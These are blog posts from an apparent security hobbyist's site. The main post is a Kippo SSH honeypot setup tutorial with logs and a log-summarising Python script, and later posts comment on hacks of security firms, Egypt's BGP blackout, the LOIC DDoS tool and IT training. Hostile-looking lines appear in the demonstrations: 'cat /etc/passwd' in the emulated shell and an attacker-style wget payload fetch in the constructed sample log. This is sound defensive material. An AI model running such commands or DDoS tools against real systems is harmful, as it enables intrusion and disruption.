Kippo medium interactive honeypot

March 3rd, 2011

I spent the last few minutes working on setting up Kippo. Kippo is a medium-interaction SSH honeypot: it runs its own SSH server, records the brute-force attempts made against it and, if an attacker guesses the password, drops them into an emulated shell where every command is logged and any tool they download is captured. Nothing the attacker types is executed on the real host. It was fairly simple to set up on an Ubuntu 10.10 machine, so here we go:

First, install the Twisted dependencies (Kippo's SSH server is built on Twisted Conch):


metacortex@ubuntu:~/SecTools/kippo$ sudo aptitude install python-twisted-conch python-twisted-web

Once Conch is installed, download Kippo and extract it:


metacortex@ubuntu:~/SecTools/kippo$ wget http://kippo.googlecode.com/files/kippo-0.5.tar.gz
metacortex@ubuntu:~/SecTools/kippo$ tar -zxvf kippo-0.5.tar.gz
metacortex@ubuntu:~/SecTools/kippo$ cd kippo-0.5

You will now see the following files:


metacortex@ubuntu:~/SecTools/kippo/kippo-0.5$ ls
data dl doc fs.pickle honeyfs kippo kippo.cfg kippo.tac log start.sh txtcmds utils

From here, edit the config file (kippo.cfg). There are a few lines you will want to change.


ssh_port = 2222

Kippo must not be run as root, so choose a listening port that does not require root privileges (anything above 1024). I would like to have Kippo open on 22 so what I have done is forward port 22 to port 2222 on my firewall. Presenting the honeypot on the standard port matters, because that is the port the brute-force scanners hit, and the redirect lets Kippo keep running as an unprivileged user.


hostname = sales

This is the hostname shown in the prompt of the emulated shell once you log in.


password = 123456

This is the root password Kippo accepts; whoever guesses it gets the emulated shell. A weak value such as 123456 is deliberate: you want the scanners' wordlists to succeed so that you get to see what they do after logging in.

Once the config is ready, start Kippo. Remember, we are not running as root:


metacortex@ubuntu:~/SecTools/kippo/kippo-0.5$ ./start.sh
Starting kippo in background...
/home/dan/SecTools/kippo/kippo-0.5/kippo/commands/ping.py:6: DeprecationWarning: the md5 module is deprecated; use hashlib instead
import time, re, random, md5
Generating RSA keypair…
done.

You will see the deprecation warning, but it is harmless and can be ignored. Now that Kippo has generated its RSA host key, we can log in to it:


metacortex@ubuntu:~/SecTools/kippo/kippo-0.5$ ssh root@127.0.0.1 -p 2222
The authenticity of host '[127.0.0.1]:2222 ([127.0.0.1]:2222)' can't be established.
RSA key fingerprint is eb:de:07:eb:8f:e0:e4:c4:1e:1d:d3:eb:02:20:53:f1.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[127.0.0.1]:2222' (RSA) to the list of known hosts.
Password:
sales:~# ls
sales:~# pwd
/root
sales:~# id
uid=0(root) gid=0(root) groups=0(root)
sales:~# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
richard:x:1000:1000:richard,,,:/home/richard:/bin/bash
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin

Here you can see that we were able to log in with the password 123456. Note that none of this touched the real system: the prompt, /root and the contents of /etc/passwd all come from Kippo's emulated filesystem (fs.pickle and the honeyfs directory), and ls, pwd, id and cat are emulated commands, not real binaries. Now let's look at the logs in the log directory:


metacortex@ubuntu:~/SecTools/kippo/kippo-0.5$ cd log/
metacortex@ubuntu:~/SecTools/kippo/kippo-0.5/log$ cat kippo.log
2011-01-31 13:41:34-0800 [-] Log opened.
2011-01-31 13:41:34-0800 [-] twistd 10.1.0 (/usr/bin/python 2.6.6) starting up.
2011-01-31 13:41:34-0800 [-] reactor class: twisted.internet.selectreactor.SelectReactor.
2011-01-31 13:41:34-0800 [-] kippo.core.honeypot.HoneyPotSSHFactory starting on 2222
2011-01-31 13:41:34-0800 [-] Starting factory
2011-01-31 13:44:43-0800 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 127.0.0.1:44261 (127.0.0.1:2222) [session: 0]
2011-01-31 13:44:43-0800 [HoneyPotTransport,0,127.0.0.1] Remote SSH version: SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5
2011-01-31 13:44:43-0800 [HoneyPotTransport,0,127.0.0.1] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2011-01-31 13:44:43-0800 [HoneyPotTransport,0,127.0.0.1] outgoing: aes128-ctr hmac-md5 none
2011-01-31 13:44:43-0800 [HoneyPotTransport,0,127.0.0.1] incoming: aes128-ctr hmac-md5 none
2011-01-31 13:44:43-0800 [HoneyPotTransport,0,127.0.0.1] connection lost
2011-01-31 13:45:10-0800 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 127.0.0.1:44262 (127.0.0.1:2222) [session: 1]
2011-01-31 13:45:10-0800 [HoneyPotTransport,1,127.0.0.1] Remote SSH version: SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5
2011-01-31 13:45:10-0800 [HoneyPotTransport,1,127.0.0.1] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2011-01-31 13:45:10-0800 [HoneyPotTransport,1,127.0.0.1] outgoing: aes128-ctr hmac-md5 none
2011-01-31 13:45:10-0800 [HoneyPotTransport,1,127.0.0.1] incoming: aes128-ctr hmac-md5 none
2011-01-31 13:45:12-0800 [HoneyPotTransport,1,127.0.0.1] NEW KEYS
2011-01-31 13:45:12-0800 [HoneyPotTransport,1,127.0.0.1] starting service ssh-userauth
2011-01-31 13:45:12-0800 [SSHService ssh-userauth on HoneyPotTransport,1,127.0.0.1] root trying auth none
2011-01-31 13:45:12-0800 [SSHService ssh-userauth on HoneyPotTransport,1,127.0.0.1] root trying auth keyboard-interactive
2011-01-31 13:45:15-0800 [SSHService ssh-userauth on HoneyPotTransport,1,127.0.0.1] login attempt [root/123456] succeeded
2011-01-31 13:45:15-0800 [SSHService ssh-userauth on HoneyPotTransport,1,127.0.0.1] root authenticated with keyboard-interactive
2011-01-31 13:45:15-0800 [SSHService ssh-userauth on HoneyPotTransport,1,127.0.0.1] starting service ssh-connection
2011-01-31 13:45:15-0800 [SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] got channel session request
2011-01-31 13:45:15-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] channel open
2011-01-31 13:45:15-0800 [SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] got global no-more-sessions@openssh.com request
2011-01-31 13:45:15-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] pty request: xterm (24, 138, 0, 0)
2011-01-31 13:45:15-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] Terminal size: 24 138
2011-01-31 13:45:15-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] unhandled request for env
2011-01-31 13:45:15-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] getting shell
2011-01-31 13:45:15-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] Opening TTY log: log/tty/20110131-134515-8373.log
2011-01-31 13:45:20-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] CMD: ls
2011-01-31 13:45:20-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] Command found: ls
2011-01-31 13:45:21-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] CMD: pwd
2011-01-31 13:45:21-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] Command found: pwd
2011-01-31 13:45:22-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] CMD: id
2011-01-31 13:45:22-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] Command found: id
2011-01-31 13:45:33-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] CMD: cat /etc/passwd
2011-01-31 13:45:33-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] Command found: cat /etc/passwd
2011-01-31 13:45:33-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] Updating realfile to honeyfs//etc/passwd

Now you have all you need for your honeypot. Go ahead and put it out on the Internet and see what you get. Keep it on its own network segment, though: the emulated shell cannot hurt anything, but the box it runs on is a real host exposed to the Internet, and the interesting artifacts (kippo.log, the per-session tty logs and whatever gets downloaded into the dl directory) are what you want to pull off it regularly.
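The log has a regular shape, so a short script can turn a day of kippo.log into a per-session summary: which source tried which credentials, who got a shell, what they ran and what they fetched. The following is an added example and not part of Kippo; it assumes only the line shapes visible in the log above (the HoneyPotTransport,<n>,<peer> context, the "login attempt [user/password] succeeded|failed" message, the "Opening TTY log" and "CMD:" lines), and the sample log it carries is constructed, not captured traffic.

```python
"""Per-session summary of a Kippo 0.5 kippo.log.

Added example, not part of Kippo. It relies only on the line shapes seen in
the log above (twistd timestamp, a [context] naming HoneyPotTransport,<n>,<peer>,
and the "New connection", "Remote SSH version", "login attempt [u/p] ...",
"Opening TTY log" and "CMD:" messages). The sample log is constructed.
"""
import re
import sys
from collections import Counter

LINE = re.compile(r'^(?P<ts>\S+ \S+) \[(?P<ctx>[^\]]*)\] (?P<msg>.*)$')
TRANSPORT = re.compile(r'HoneyPotTransport,(?P<sid>\d+),(?P<peer>[\d.]+)')
NEW_CONN = re.compile(r'^New connection: (?P<peer>[\d.]+):\d+ \(.*\) \[session: (?P<sid>\d+)\]$')
VERSION = re.compile(r'^Remote SSH version: (?P<banner>.*)$')
TTY = re.compile(r'^Opening TTY log: (?P<path>\S+)$')
LOGIN = re.compile(r'^login attempt \[(?P<user>[^/]*)/(?P<pw>.*)\] (?P<result>succeeded|failed)$')
CMD = re.compile(r'^CMD: (?P<cmd>.*)$')
URL = re.compile(r'(?:https?|ftp)://\S+')

# Constructed sample in the format shown above; not real traffic
# (203.0.113.0/24 and 198.51.100.0/24 are documentation address ranges).
SAMPLE_LOG = """\
2011-01-31 13:44:43-0800 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 127.0.0.1:44261 (127.0.0.1:2222) [session: 0]
2011-01-31 13:44:43-0800 [HoneyPotTransport,0,127.0.0.1] Remote SSH version: SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5
2011-01-31 13:44:43-0800 [HoneyPotTransport,0,127.0.0.1] connection lost
2011-01-31 13:45:10-0800 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 127.0.0.1:44262 (127.0.0.1:2222) [session: 1]
2011-01-31 13:45:10-0800 [HoneyPotTransport,1,127.0.0.1] Remote SSH version: SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5
2011-01-31 13:45:13-0800 [SSHService ssh-userauth on HoneyPotTransport,1,127.0.0.1] login attempt [root/password] failed
2011-01-31 13:45:15-0800 [SSHService ssh-userauth on HoneyPotTransport,1,127.0.0.1] login attempt [root/123456] succeeded
2011-01-31 13:45:15-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] Opening TTY log: log/tty/20110131-134515-8373.log
2011-01-31 13:45:20-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] CMD: ls
2011-01-31 13:45:22-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] CMD: id
2011-01-31 13:45:33-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] CMD: wget http://198.51.100.7/x.tgz
2011-01-31 13:50:02-0800 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 203.0.113.9:51000 (127.0.0.1:2222) [session: 2]
2011-01-31 13:50:02-0800 [HoneyPotTransport,2,203.0.113.9] Remote SSH version: SSH-2.0-libssh-0.1
2011-01-31 13:50:03-0800 [SSHService ssh-userauth on HoneyPotTransport,2,203.0.113.9] login attempt [root/password] failed
2011-01-31 13:50:04-0800 [SSHService ssh-userauth on HoneyPotTransport,2,203.0.113.9] login attempt [admin/admin] failed
2011-01-31 13:50:04-0800 [HoneyPotTransport,2,203.0.113.9] connection lost
"""

def new_session(peer):
    return {'peer': peer, 'client': None, 'tty': None, 'logins': [], 'commands': []}

def parse_log(text):
    """Group log lines by Kippo session id (the HoneyPotTransport number)."""
    sessions = {}
    for raw in text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # tracebacks and other lines not in twistd shape
        ctx, msg = m.group('ctx'), m.group('msg')
        nc = NEW_CONN.match(msg)
        if nc:
            sessions[int(nc.group('sid'))] = new_session(nc.group('peer'))
            continue
        t = TRANSPORT.search(ctx)
        if not t:
            continue  # factory start-up lines carry no transport
        sess = sessions.setdefault(int(t.group('sid')), new_session(t.group('peer')))
        for rx, key in ((VERSION, 'client'), (TTY, 'tty')):
            v = rx.match(msg)
            if v:
                sess[key] = v.group(1)
        l = LOGIN.match(msg)
        if l:
            sess['logins'].append((l.group('user'), l.group('pw'), l.group('result') == 'succeeded'))
        c = CMD.match(msg)
        if c:
            sess['commands'].append(c.group('cmd'))
    return sessions

def summarize(sessions):
    """Login counts, most-tried credentials, sessions that got a shell, URLs fetched."""
    creds = Counter()
    failed = succeeded = 0
    compromised, downloads = [], []
    for sid, s in sorted(sessions.items()):
        for user, pw, ok in s['logins']:
            creds[(user, pw)] += 1
            succeeded += ok
            failed += not ok
        if any(ok for _, _, ok in s['logins']):
            compromised.append(sid)
        for cmd in s['commands']:  # URLs in commands (e.g. wget) show what should be in dl/
            downloads.extend((sid, s['peer'], u) for u in URL.findall(cmd))
    return {'sessions': len(sessions), 'failed': failed, 'succeeded': succeeded,
            'top_credentials': creds.most_common(5),
            'compromised': compromised, 'downloads': downloads}

def report(summary):
    lines = ['%(sessions)d sessions, %(failed)d failed logins, %(succeeded)d successful' % summary]
    for (user, pw), n in summary['top_credentials']:
        lines.append('  %3d  %s/%s' % (n, user, pw))
    for sid in summary['compromised']:
        lines.append('session %d: attacker got a shell' % sid)
    for sid, peer, url in summary['downloads']:
        lines.append('session %d (%s) fetched %s' % (sid, peer, url))
    return '\n'.join(lines)

if __name__ == '__main__':
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    print(report(summarize(parse_log(text))))
```

Run it against a real log with the path as the first argument (for example log/kippo.log); with no argument it summarises the constructed sample. Sessions are keyed by the transport number because that is the one identifier that appears in every line of a session; the "session (0)" inside the SSHChannel context is the channel number and is the same for every session, so it is deliberately not used. The per-session tty log path is kept so that an interesting session can be replayed with the playlog script in the utils directory.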

Someone Will Get In

February 14th, 2011

It seems that more and more security companies have been getting owned recently. The three notable ones in the past month or so have been Goatse Security, Ligatt, and HBGary. If you were not aware of who Goatse Security are, you may remember the breach a while ago that exposed the email addresses of iPad owners; that was the guys from Goatse Security. HBGary is an incident response company, and Ligatt Security is a company that has gained more visibility in the security world than it should.

I will look at the Goatse Security compromise first. A screenshot of the site after getting owned can be seen here. There is not a whole lot behind this other than it was done for the “lolz” and as a “look what I did” kind of thing. HBGary and Ligatt are much more interesting.

The subject of Ligatt offers so much material that writing it all up would take more time than I want to give Ligatt Security and Gregory D Evans. For all of the background on Ligatt/Mr. Evans, please see Attrition.org. What happened recently is that the website Ligatt Leaks went live in an attempt to expose everything wrong with Mr. Evans. Part of the fallout from Ligatt Leaks is that someone got into Ligatt’s mail server for several days, pulled down all of the mail and released it in a torrent.

HBGary is the most interesting of the three. I had never heard of HBGary until one of their executives went public stating that he had found the personal information of the people who run Anonymous and would be selling it to the FBI. Anonymous not only rebutted the information, stating that it was not correct, but also pointed out that HBGary was going to turn over innocent people to the FBI. This angered Anonymous, so they took a page from the Ligatt book, got into HBGary’s mail server and released all of the emails stored there, detailing their attack on Anonymous and how HBGary was planning to start targeting WikiLeaks donors.

Being a security shop and getting hacked is a pretty big blow, not only to your ego but to your reputation as well, but it happens all too often. Some further examples: Dan Kaminsky getting hacked, Kaspersky getting hacked, and Kevin Mitnick’s website getting hacked.

In my eyes, it comes down to the fact that you don’t write all of the software that you use (personally or for business). If you do not write all of the code yourself, you cannot be 100% certain that there are no holes, nor can you fully trust it (and even if you do write it all yourself, you are human and make mistakes). Being in the security industry also requires a sense of humility, as there will always be someone who can find a hole. The key is not to piss these people off, and if they do find a hole, to work with them to get it fixed. Do not paint a bullseye on your back and ask for it. Many people have done this and many have failed (see the LifeLock CEO and the StrongWebmail contest).

Having kept tabs on this industry for several years, I can tell you that there are plenty of people I would not dream of pissing off, because I know how good they are at attacking technology and that I would not stand a chance against them. It just boils down to this: you need to assume everything is vulnerable and that someone will get in.

.eg gone in the blink of an eye

January 31st, 2011

Over the past week, Egypt has been in a near state of anarchy, with protesters calling for the resignation of the Egyptian president and for government reform. Like most major protests, it has turned into citizens vs. government, complete with tear gas, riot gear and torched cars. Just as in the 2009–2010 Iranian election protests, protesters turned to the Internet to organize, using sites such as Twitter and Facebook. These sites were fairly quickly blocked by the ISPs.

As the cat-and-mouse game plays out, protesters start using tools to reach the blocked services, and Tor becomes a common way of communicating across the Internet. The government was not happy about this, so what did they do? Last night, Egyptian ISPs withdrew 3500 BGP routes. Withdrawing a route tells the rest of the Internet that the prefix is no longer reachable through that network, so once the routes were gone there was simply no path left for packets to follow; the effect was to blackhole 88% of all traffic to and from Egypt. Arbor Networks produced a very good graph of Internet traffic to and from .eg shortly before and after the routes were removed.



This is staggering and scary, as the US government has been lobbying to be able to do the exact same thing. There is a petition online aimed at fighting this “kill switch” here. I am very curious what would happen if the US government ever decided to drop all Internet connectivity. I imagine it would only make whatever civil unrest prompted it even worse.

Low Orbit Ion Cannon

December 9th, 2010

Anonymous have mobilized. Well, a subset of Anonymous under the banner of Operation Payback have started attacking organizations that have discontinued services to WikiLeaks (at the time of writing WikiLeaks has no DNS name and is reachable only at 213.251.145.96). After reading several articles on the subject, I was familiar with the tool Anonymous was using to attack these sites. From what I can tell there are several versions of the tool, named Low Orbit Ion Cannon (LOIC for short). LOIC is a modified version of an open-source load tester; the modification makes it connect to an IRC channel and take its list of targets from there.

This is interesting in and of itself, as the users are joining an opt-in botnet, and one without any anonymity: every request goes out from the volunteer's own IP address. I did not have the time to download it and take a look, but I did run into a JavaScript version that piqued my interest a bit. I went ahead and grabbed a copy of it and put it up here. It is pretty basic: you put the target URL in the first box and launch with “IMMA CHARGING MEH LAZER”. Looking at a packet capture of the traffic, it does exactly what you would expect: it opens several connections to the server in question. At this point it does nothing but HTTP and HTTPS requests; it would be interesting to see it support other protocols such as SSH and DNS, though a script running inside a browser cannot open raw sockets, so that would need a native client rather than a web page.

Bullshit

November 5th, 2010

One of the things I see more than anything else during the 8 hours a day that I put in is the sheer amount of bullshit. There is so much bullshit I could swim in it. I have several colleagues who give our customers nothing but bullshit, because they don’t know what they are doing and they know it. It surprises me how many people in IT get by on nothing but good old-fashioned bullshit. This applies not only to my colleagues but to my customers as well.

There are several reasons I see for why bullshit is so rampant, but by far the biggest is the lack of training. There are more times than I can count where a customer is trying to roll out a new core router or firewall into their network but does not know the first thing about configuring it. I normally come in at the point where they are pissed off because it’s not a plug-and-play solution. You’d be surprised how many large corporations I see this from. I don’t know why this is not completely obvious, but if you need your network to function as a business, you should make sure the employees in charge of the network know what they are doing.

This is why I have been a huge proponent of training for a long time, and it is part of the reason why I jump at every opportunity for a little additional training or anything where I can learn something. I never want to catch myself in a position where I am helpless because of my own ignorance and have to rely on someone else to do it all for me.

 
     